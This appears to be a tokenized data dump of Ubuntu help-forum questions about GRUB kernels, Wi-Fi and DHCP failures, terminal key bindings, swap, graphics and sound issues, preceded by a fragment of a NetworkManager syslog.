[ 7271 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating may 17 23:20:10 localhost kernel : [ 4771.011148 ] wlan0 : associate with c0:3f:0e:17:3f : be ( try 1 ) may 17 23:20:10 localhost kernel : [ 4771.015069 ] wlan0 : rx reassocresp from c0:3f:0e:17:3f : be ( capab=0x411 status=0 aid=2 ) may 17 23:20:10 localhost kernel : [ 4771.015073 ] wlan0 : associated may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : associating - > completed may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'netgear ' . may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > dhcpcd started with pid 15011 may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . may 17 23:20:10 localhost dhcpcd [ 15011 ] : version 5.5.6 starting may 17 23:20:10 localhost avahi-daemon [ 7383 ] : withdrawing address record for fe80 : :d2df:9aff : fe62:4a8b on wlan0 . may 17 23:20:10 localhost avahi-daemon [ 7383 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :d2df:9aff : fe62:4a8b . may 17 23:20:10 localhost avahi-daemon [ 7383 ] : interface wlan0.ipv6 no longer relevant for mdns . may 17 23:20:10 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit may 17 23:20:10 localhost dhcpcd [ 15011 ] : wlan0 : sending ipv6 router solicitation may 17 23:20:10 localhost dhcpcd [ 15011 ] : wlan0 : sendmsg : can not assign requested address may 17 23:20:10 localhost dhcpcd [ 15011 ] : wlan0 : rebinding lease of 192.168.1.8 may 17 23:20:11 localhost avahi-daemon [ 7383 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :d2df:9aff : fe62:4a8b . may 17 23:20:11 localhost avahi-daemon [ 7383 ] : new relevant interface wlan0.ipv6 for mdns . may 17 23:20:11 localhost avahi-daemon [ 7383 ] : registering new address record for fe80 : :d2df:9aff : fe62:4a8b on wlan0.* . may 17 23:20:14 localhost dhcpcd [ 15011 ] : wlan0 : sending ipv6 router solicitation may 17 23:20:14 localhost dhcpcd [ 15011 ] : wlan0 : sendmsg : operation not permitted may 17 23:20:15 localhost dhcpcd [ 15011 ] : wlan0 : broadcasting for a lease may 17 23:20:18 localhost dhcpcd [ 15011 ] : wlan0 : sending ipv6 router solicitation may 17 23:20:18 localhost dhcpcd [ 15011 ] : wlan0 : sendmsg : operation not permitted may 17 23:20:20 localhost kernel : [ 4781.298020 ] wlan0 : no ipv6 routers present may 17 23:20:22 localhost dhcpcd [ 15011 ] : wlan0 : sending ipv6 router solicitation may 17 23:20:22 localhost dhcpcd [ 15011 ] : wlan0 : sendmsg : operation not permitted may 17 23:20:22 localhost dhcpcd [ 15011 ] : wlan0 : no ipv6 routers available may 17 23:20:30 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . may 17 23:20:30 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... may 17 23:20:30 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 17 23:20:30 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 17 23:20:40 localhost dhcpcd [ 15011 ] : timed out may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : dhcpv4 client pid 15011 exited with status 1 may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] may 17 23:20:40 localhost networkmanager [ 7271 ] : < warn > activation ( wlan0 ) failed for access point ( netgear ) may 17 23:20:40 localhost networkmanager [ 7271 ] : < warn > activation ( wlan0 ) failed . may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] may 17 23:20:40 localhost kernel : [ 4801.083162 ] wlan0 : deauthenticating from c0:3f:0e:17:3f : be by local choice ( reason=3 ) may 17 23:20:40 localhost kernel : [ 4801.105483 ] cfg80211 : calling crda to update world regulatory domain may 17 23:20:40 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > auto-activating connection 'netgear ' . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) starting connection 'netgear' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) : access point 'netgear ' has security , but secrets are required . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) : connection 'netgear ' has security , and secrets exist . no new secrets needed . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'ssid ' value 'netgear' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'scan_ssid ' value '1' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'bssid ' value 'c0:3f:0e:17:3f : be' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'key_mgmt ' value 'none' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'wep_key0 ' value ' < omitted > ' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : added 'wep_tx_keyidx ' value '0' may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > config : set interface ap_scan to 1 may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating may 17 23:20:43 localhost kernel : [ 4804.988915 ] wlan0 : authenticate with c0:3f:0e:17:3f : be ( try 1 ) may 17 23:20:43 localhost kernel : [ 4804.990920 ] wlan0 : authenticated may 17 23:20:43 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating may 17 23:20:44 localhost kernel : [ 4805.010329 ] wlan0 : associate with c0:3f:0e:17:3f : be ( try 1 ) may 17 23:20:44 localhost kernel : [ 4805.014352 ] wlan0 : rx reassocresp from c0:3f:0e:17:3f : be ( capab=0x411 status=0 aid=2 ) may 17 23:20:44 localhost kernel : [ 4805.014360 ] wlan0 : associated may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : supplicant interface state : associating - > completed may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'netgear ' . may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > dhcpcd started with pid 15019 may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . may 17 23:20:44 localhost avahi-daemon [ 7383 ] : withdrawing address record for fe80 : :d2df:9aff : fe62:4a8b on wlan0 . may 17 23:20:44 localhost avahi-daemon [ 7383 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :d2df:9aff : fe62:4a8b . may 17 23:20:44 localhost avahi-daemon [ 7383 ] : interface wlan0.ipv6 no longer relevant for mdns . may 17 23:20:44 localhost dhcpcd [ 15019 ] : version 5.5.6 starting may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . may 17 23:20:44 localhost dhcpcd [ 15019 ] : wlan0 : sending ipv6 router solicitation may 17 23:20:44 localhost dhcpcd [ 15019 ] : wlan0 : sendmsg : can not assign requested address may 17 23:20:44 localhost dhcpcd [ 15019 ] : wlan0 : rebinding lease of 192.168.1.8 may 17 23:20:44 localhost networkmanager [ 7271 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit may 17 23:20:45 localhost avahi-daemon [ 7383 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :d2df:9aff : fe62:4a8b . may 17 23:20:45 localhost avahi-daemon [ 7383 ] : new relevant interface wlan0.ipv6 for mdns . may 17 23:20:45 localhost avahi-daemon [ 7383 ] : registering new address record for fe80 : :d2df:9aff : fe62:4a8b on wlan0 . * .
103197	why is my ubuntu system not using the correct kernel ?	we 're having a bit of confusion on a ubuntu remote system -- /boot/grub/menu.lst suggests the system should boot into kernel 2.6.35-30-generic , but it is actually running kernel 2.6.32-27-generic . where should i look to start figuring out why this is happening and how to fix it ? specifically , /boot/grub/menu.lst has default 0 and the first entry is title ubuntu 10.10 , kernel 2.6.35-30-generic uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.35-30-generic root=uuid=67717ee3-cbf9-45d2- ae97-820256f4c4fd ro quiet splash initrd /boot/initrd.img-2.6.35-30-generic further , i 've confirmed that /boot/vmlinuz-2.6.35-30-generic and /boot/initrd.img-2.6.35-30-generic exist and have appropriate permissions . meanwhile , uname -a returns : $ uname -a linux cuda2 2.6.32-27-generic # 49-ubuntu smp thu dec 2 00:51:09 utc 2010 x86_64 gnu/linux edit : i 've also tried re-running update-grub , and rebooting ; no luck . here 's the full menu.lst , as requested by a commenter : # menu.lst - see : grub ( 8 ) , info grub , update-grub ( 8 ) # grub-install ( 8 ) , grub-floppy ( 8 ) , # grub-md5-crypt , /usr/share/doc/grub # and /usr/share/doc/grub-legacy-doc/ . # # default num # set the default entry to the entry number num . numbering starts from 0 , and # the entry number 0 is the default if the command is not used . # # you can specify 'saved ' instead of a number . in this case , the default entry # is the entry saved with the command 'savedefault ' . # warning : if you are using dmraid do not use 'savedefault ' or your # array will desync and will not let you boot your system . default 0 # # timeout sec # set a timeout , in sec seconds , before automatically booting the default entry # ( normally the first entry defined ) . timeout 3 # # hiddenmenu # hides the menu by default ( press esc to see the menu ) hiddenmenu # pretty colours # color cyan/blue white/blue # # password [ ' -- md5 ' ] passwd # if used in the first section of a menu file , disable all interactive editing # control ( menu entry editor and command-line ) and entries protected by the # command 'lock' # e.g . password topsecret # password -- md5 $ 1 $ glhu0/ $ aw78khk1qfv3p2b2znuoe/ # password topsecret # # examples # # title windows 95/98/nt/2000 # root ( hd0,0 ) # makeactive # chainloader +1 # # title linux # root ( hd0,1 ) # kernel /vmlinuz root=/dev/hda2 ro # # # put static boot stanzas before and/or after automagic kernel list # # # begin automagic kernels list # # lines between the automagic kernels list markers will be modified # # by the debian update-grub script except for the default options below # # do not uncomment them , just edit them to your needs # # # # start default options # # # # default kernel options # # default kernel options for automagic boot options # # if you want special options for specific kernels use kopt_x_y_z # # where x.y.z is kernel version . minor versions can be omitted . # # e.g . kopt=root=/dev/hda1 ro # # kopt_2_6_8=root=/dev/hdc1 ro # # kopt_2_6_8_2_686=root=/dev/hdc2 ro # kopt=root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro # # default grub root device # # e.g . groot= ( hd0,0 ) # groot=67717ee3-cbf9-45d2-ae97-820256f4c4fd # # should update-grub create alternative automagic boot options # # e.g . alternative=true # # alternative=false # alternative=true # # should update-grub lock alternative automagic boot options # # e.g . lockalternative=true # # lockalternative=false # lockalternative=false # # additional options to use with the default boot option , but not with the # # alternatives # # e.g . defoptions=vga=791 resume=/dev/hda5 # defoptions=quiet splash # # should update-grub lock old automagic boot options # # e.g . lockold=false # # lockold=true # lockold=false # # xen hypervisor options to use with the default xen boot option # xenhopt= # # xen linux kernel options to use with the default xen boot option # xenkopt=console=tty0 # # altoption boot targets option # # multiple altoptions lines are allowed # # e.g . altoptions= ( extra menu suffix ) extra boot options # # altoptions= ( recovery ) single # altoptions= ( recovery mode ) single # # controls how many kernels should be put into the menu.lst # # only counts the first occurence of a kernel , not the # # alternative kernel options # # e.g . howmany=all # # howmany=7 # howmany=all # # specify if running in xen domu or have grub detect automatically # # update-grub will ignore non-xen kernels when running in domu and vice versa # # e.g . indomu=detect # # indomu=true # # indomu=false # indomu=detect # # should update-grub create memtest86 boot option # # e.g . memtest86=true # # memtest86=false # memtest86=true # # should update-grub adjust the value of the default booted system # # can be true or false # updatedefaultentry=false # # should update-grub add savedefault to the default options # # can be true or false # savedefault=false # # # # end default options # # title ubuntu 10.10 , kernel 2.6.35-30-generic uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.35-30-generic root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro quiet splash initrd /boot/initrd.img-2.6.35-30-generic title ubuntu 10.10 , kernel 2.6.35-30-generic ( recovery mode ) uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.35-30-generic root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro single initrd /boot/initrd.img-2.6.35-30-generic title ubuntu 10.10 , kernel 2.6.32-32-server uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.32-32-server root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro quiet splash initrd /boot/initrd.img-2.6.32-32-server title ubuntu 10.10 , kernel 2.6.32-32-server ( recovery mode ) uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.32-32-server root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro single initrd /boot/initrd.img-2.6.32-32-server title ubuntu 10.10 , kernel 2.6.32-27-generic uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.32-27-generic root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro quiet splash initrd /boot/initrd.img-2.6.32-27-generic title ubuntu 10.10 , kernel 2.6.32-27-generic ( recovery mode ) uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/vmlinuz-2.6.32-27-generic root=uuid=67717ee3-cbf9-45d2-ae97-820256f4c4fd ro single initrd /boot/initrd.img-2.6.32-27-generic title chainload into grub 2 root 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/grub/core.img title ubuntu 10.10 , memtest86+ uuid 67717ee3-cbf9-45d2-ae97-820256f4c4fd kernel /boot/memtest86+.bin # # # end debian automagic kernels list to add complication and joy to my life , this is a desktop machine in a remote datacenter ; we do n't have either local access or serial-console access . suggestions ?
103198	what application in ubuntu that is like mdma in windows ?	i use mdma in windows to connect my gsm modem . i connect it in gprs signal . then i changed the signal to 3g without disconnecting the internet connection . is there any application that can do like the description above ? thanx before ; d
103199	can i configure the glow color of the alt-tab switcher ?	i 'm using unity 3d . when switching windows using alt+tab , the selected windows get a white backlight , which is not very readable . can i change this behavior somehow ? e.g . zoom in the selected icon to make it bigger ? i do n't see any options in ccsm for this . maybe there is any better alternative for the default window switcher ?
103200	unbinding f10 on a terminal	i have noticed that if i press f10 when on a terminal , ubuntu or the terminal opens the file menu . is there any way to unbind this ? i do n't see any entries with f10 on system settings - > keyboard shortcuts i want to use function keys in emacs to debug my code ( e.g . f10 triggering gud-step , etc . ) when running emacs within a terminal ( emacs -nw ) but at the moment the terminal seems to be capturing my keys . update 1 : if i go to edit - > keyboard shortcuts i can disable the option `` enable the menu short key ( f10 by default ) '' . so i disabled it . however , the key f10 is still bound to the menu ! ! is there a way to unbind this key other than through the edit- > keyboard shortcuts menu ? perhaps there is a configuration text file under etc where i can activate/deactivate keyboard shortcuts ? update 2 : i also followed all the tricks here and they did n't work . f10 still behaves as an accelerator in the terminal . this is all on ubuntu 11.10 update 3 : following the suggestions in this link i also tried : 3.1 adding the following code to ~/.gtkrc-2.0 binding `` nokeyboardnavigation '' { unbind `` < shift > f10 '' } class * binding `` nokeyboardnavigation '' 3.2 adding the following code to ~/.config/gtk-3.0/gtk.css @ binding-set nokeyboardnavigation { unbind `` < shift > f10 '' } * { gtk-key-bindings : nokeyboardnavigation } and the problem still persists .
103201	is there performance issue when using a virtual machine in a mounted partition ?	i used to have a windows 7 setup on my desktop . c : \ for system . d : \ for data . now i 've decided to install ubuntu as the main os : \ for ubuntu ( 80gb ) swap for swap d : \ i kept this partition for the data . it still contains my data . i 've opened the file system and noticed that i can access the data on it , i just have to `` mount '' it ? it seems ubuntu is doing that for me though as i have n't had to configure anything . will creating a fixed size virual machine disc ( virtualbox ) on the mounted ( d : \ ) partition make my virtual machine slower than if it were on a regular ext4 partition ?
103202	desktop not fluid , mouse and screen jump every seconds	i 'm new on ubuntu and i 'm having problems of fluidity . i 've installed the latest version , 11.10 in 64 bits mode and my issue is that when booting normally , mouse and screen in general jump every five seconds or so , a bit nasty . but if i launch ubuntu from recovery mode , it goes perfect and smooth . is there anyway of solving this or is just accept and choose recovery mode at every launch ? thanks .
103210	compiz eventually gets choppy and slow	when i do a fresh start of my machine , compiz is fast and smooth . after a few hours , it gets very choppy . for example , moving windows around just make them appear in the new place , same with switching virtual workspaces . i am using gnome classic , compiz -- replace does n't seem to fix the issue . i do n't think it is a resources issue because : do n't see any active swapping place and 15gbytes free of ram ( 24 in total ) radeon hd 6900 series with 2gbytes if video memory . cpu : intel ( r ) core ( tm ) i7 cpu 950 @ 3.07ghz in compiz settings vsync is not enabled . any ideas ?
103211	how do i automatically enable num lock at the login screen ?	i want to automatically enable num lock ( i.e . light is on ) , and use lightdm as my desktop manager . how can i do that ?
103220	how do i type an ` @ ` ( at sign ) symbol ?	i have ubuntu on my macbook 2007 with a spanish keyboard , on macos the @ -sign was typed using alt ( option ) + 2 , but on ubuntu i have no idea . i have to copy and paste it every time . how do i type an at sign ?
103228	microphone does n't work with skype on an hp pavilion dv5	i have a hp pavilion dv5 with ubuntu 11.10 but when i use skype the microphone not working and i in italy do n't see a guide for resolv this problem please help me and sorry for my english . try to help me in way more simple .
103229	ubuntu 11.10 ssd install - > error : unknown filesystem	i have tried to install ubuntu 11.10 x64 and x86 a couple of times onto a new ocz vertex 30gb , with ext3 and ext4 partitions . after installing , it reboots into ubuntu properly , but hangs on shutdown . after a few hours , i held the power button to shut it off . when i reboot , i get : error : unknown filesystem grub rescue > i basically used the auto settings for install , but tried some variations ( 3gb swap and 27gb / as sda1 and 5 and the other way round . tried with ext3 and 4 and btrfs . i tried automatic partitioning for installation , and some variations ( 3gb swap , 27gb as sda1 or sda5 ) i have tried ext3 , ext 4 , and btrfs . i tried boot-repair via live usb , asl well as manually reinstalling grub , but to no avail . is it because of the ssd ? do i need to trim ? i thought 11.10 would do that for me ... is this due to my having an ssd ? do i need to trim ? . i thought 11.10 would work . i appreciate every tip and hint , as well as a solution . thanks in advance . my machine is a 3 year old lenovo n100 , core2 duo .
103231	is there a way to open a page in the browser in the background , unfocused , from the command line ?	for those familiar with osx , the behavior i 'm looking for is open -g http : //google.com , which will open a google webpage in the default browser in the background , without switching focus to it at all . i 've been testing on stock natty ( gnome , unity ... ) with chrome and then firefox set to the default browser . i 've tried both gnome-open http : //google.com and xdg-open http : //google.com , and with or without appending & > /dev/null & to the end , the browser window always gets focused . the only case where the browser does n't get focus is when the default is firefox and there is already a firefox window open . i 've also tried just calling firefox or google-chrome directly , and neither of them work . is there some combination of commands or a package i could use to get the desired behavior more reliably , regardless of whether the default browser is chrome or firefox , or whether there 's already a window open ? this is for software to be installed on others ' machines , so modifying their browser profiles is not really a solution ...
103233	how do i switch video display output command line ?	how do i switch my video card output on ubuntu server 11.10 ? it has a video card with one dvi and one vga . it 's defaulting to the vga . i want it to default to the dvi . i only have ssh connection via the network and no monitor until i can switch to the dvi output . what 's the command or config file i have to mess with to switch to the dvi output on the video card ?
103237	problem with .sh file	i do n't have any experience writing .sh files . i want to run the pvm2raw utility of this app from the volume library . i get the following error when running build.sh in ubuntu 10.10. build.sh is as follows : # make command set mmfile=v3makefile set make= '' make -f $ mmfile '' set rule= $ 1 if ( $ rule == `` '' ) set rule= '' all '' // line 16 if ( $ rule == `` deps '' ) then if ( $ hosttype == `` iris4d '' ) $ make makedepend= '' cc -m '' opts= '' -dhave_config_h -dviewer_have_dcmtk '' target=irix depend if ( $ hosttype == `` i386 '' ) $ make makedepend= '' c++ -m -i/usr/x11r6/include '' opts= '' -dhave_config_h -dviewer_have_dcmtk '' target=linux depend what 's wrong there ? edit : i followed kniwor 's advice and installed csh . now i get the following error : how can i solve this undefined variable problem ?
103240	incomplete d drive access on which ubuntu is installed	i have installed ubuntu using wubi on my windows partition ( d drive ) . however , i can not access the rest of the files on my d drive other than the `` host ' files of my ubuntu installation . system monitor indicates that my drive is fuselblk . how should i go about accessing the rest of my files on my d drive ?
103241	how to count the number of source packages	i 'm comparing ubuntu to other distributions for a number of factors , and for one factor i need the number of source packages , which is probably a better indicator than the total number of packages a distribution has . it looks like i could use apt-cache dumpavail and from each section get the package name or the source name , if there is one , then get a unique count from that . but , is there an easier , faster way ?
103242	is it safe to turn swap off permanently ?	my system was getting slower , especially when i use browsers like firefox / chromium and virtual machines . i noticed that i 've got at least 3.2 gb of free ram ( using gnome system monitor ) and there was no swapping . what i did now is swapoff -a and system system performance is up by 30 % . so my question is : is it safe to use swapoff ? will it be safe for my pc to restart with swapoff ?
103246	how to change the color of the scroll bar ?	the scrollbars in unity are of very low contrast , and i ca n't notice where the scroll bar bug is just with peripheral vision . i have to look at the scrollbar . with a very 22 '' monitor , 1920*1080 , the bar is quite small , and it 's hard to notice where the bug is . look at mac os x interface and notice the blue , contrast scroll bar bug . you do n't need to look at it directly to have the idea where you are in the page . every person 's peripheral vision is of low-res . i do n't have a screenshot , but you can imagine what you see by doing a simple trick : take a screenshot and blur it by 15px in gimp . this is how you see everything with peripheral vision . the scrollbar bug becomes completely invisible . how can i change it so that it is contrast and i see where i am every time ?
103249	how to increase brightness in smaller steps ?	is there a way to adjust lighting step ? i have lenovo l520 , and fn + light up or down adjusts by 20 % , how can i adjust the step to 10 % ? it will help me fine tune lighting at my dark room .
103250	how can i fix the gnome-shell ?	i am using gnome-shell on ubuntu 11.10 . after i installed some of the extensions , whenever it logs in ; it would not show the userbar ( the one with the clock etc ) . i tried doing the following : how to remove and reinstall gnome 3 ? but it just does n't work . obviously uninstalling will work , but i would like to be able to use the gnome-shell , and not completely remove it - as soon as i install it again ; the same problem persists . the userbar does not show up , i just get the background image , and no gui at all .
103251	revert ccsm transparency	it seems that i accidentally set my ccsm window 's transparency to 0 . now i ca n't see my ccsm because the transparency is 0 . how to revert this ? thanks
103252	ubuntu one install screen does not finish	this is an issue that ive had around for a long time , and havent been able to solve . please help me out guys , i really need ubuntu one to run on my computer . i run ubuntu 2d , on ubuntu 11.10 . when i start ubuntu one , the install screen comes and asks me if i want to install ubuntu one . i install it , type in my password and all of that , but the bar never finishes loading ! it goes to the end and then nothing happens . at first i thought it had to do with the fact that i had dăšjă dup backup , so i removed both and installed ubuntu one again through the software center . same problem . please help !
103253	how do i turn off the radeon gpu ono my hp pavilion dm4 ?	i have a hp dm4 beats edition running ubuntu 11.10 . the hp pavillion runs on-board intel graphics as well as radeon gpu . from what i have read it appears that the radeon gpu is draining my battery and also causing the laptop to overheat . battery life is down to under two hours when using the machine for simple tasks and the unit is heating up excessively . i tried activating the ati fglrx driver - but it was not successful . i also have installed the cpu control applet . for now i just want to disable the gpu and use the intel on board graphics . is there a way that i can force the system to just use the intel graphics ? i am very new to ubuntu and need some basic help .
103261	how can sort youtube lens results relevance ?	how can i set the youtube lens to sort by relevance ( or other criteria ) by default ? i 'm talking about the youtube lens explored in this omgubuntu.co.uk article .
103269	lost sound with 11.10	i installed ubuntu some days ago . the sound worked perfectly , but today there was a shortcircuit and i lost the sound . i thought it was the sound card , but i started windows xp and it worked fine . what should i do ? my sound card is an intel corporation 82801eb/er ( ich5/ich5r ) ac'97 . thanks in advance ! : )
103271	in the ubuntu software center , how are apps promoted ?	i have made a kakuro game called sukaro for ubuntu 11.10 and its successfully published in the software center ( its a commercial app ) . and so far , i have not seen any advertisements ( on websites , etc ) regarding ubuntu applications . so i was wondering , if you want to promote your published app , what should you do ? ( aside from the most obvious things like tweeting , etc . ) what options does a software developer for ubuntu has for promoting his/her applications ? are there any specific review sites or such ? i think this game i made should get some more attention because its the first game about kakuro/cross sums games . and still the only game available in that category .
103272	how can i tell what kind of partition i have ? ( ext2,3,4 ) ?	i read this article talking about chopping boot-time in half with e4rat , but in order to do so your partition has to be ext4 . how can you check what kind of partition you have ? thanks in advance zarnaik
103273	purple screen delay at ubuntu 11.04 boot	i 've got windows 7 & ubuntu 11.04 installed on my pc . when i install ubuntu , it came with grub . on grub , when i select `` ubuntu '' on boot menu , i 've got a purple screen during 16 seconds , and passed 16 seconds it shows the boot screen and loads the desktop . actually , i 've got burg installed on my pc but now , when i try to boot ubuntu , it shows a black screen with a blinking cursor durin 16 seconds . can i remove that delay ? and sorry for my bad english , i 'm from argentina .
103274	why does n't eclipse work ?	i installed ubuntu a month ago , but since this month it had crushed two times . the first time when i was watching a movie online , it turned off the screen and i could n't turn it on again . i reinstalled . the second time , there were black pieces on the screen behind the opened windows , notifications , etc . i installed it for the third time . but this time eclipse sdk does not work which worked pretty well on previous versions . what should i do ?
103280	is there any version of ubuntu that does not require pae ?	for the first time i tried to install xubuntu 12.04 on my computer using the grub4dos way . however , it stuck and showed `` this kernel requires the following features not present on the cpu : pae '' . i therefore checked my device and found that my cpu is dothan , which is quite old and without pae . so i wonder if i can solve the problem by choosing another kernel that does not require pae . thx 4 ur help .
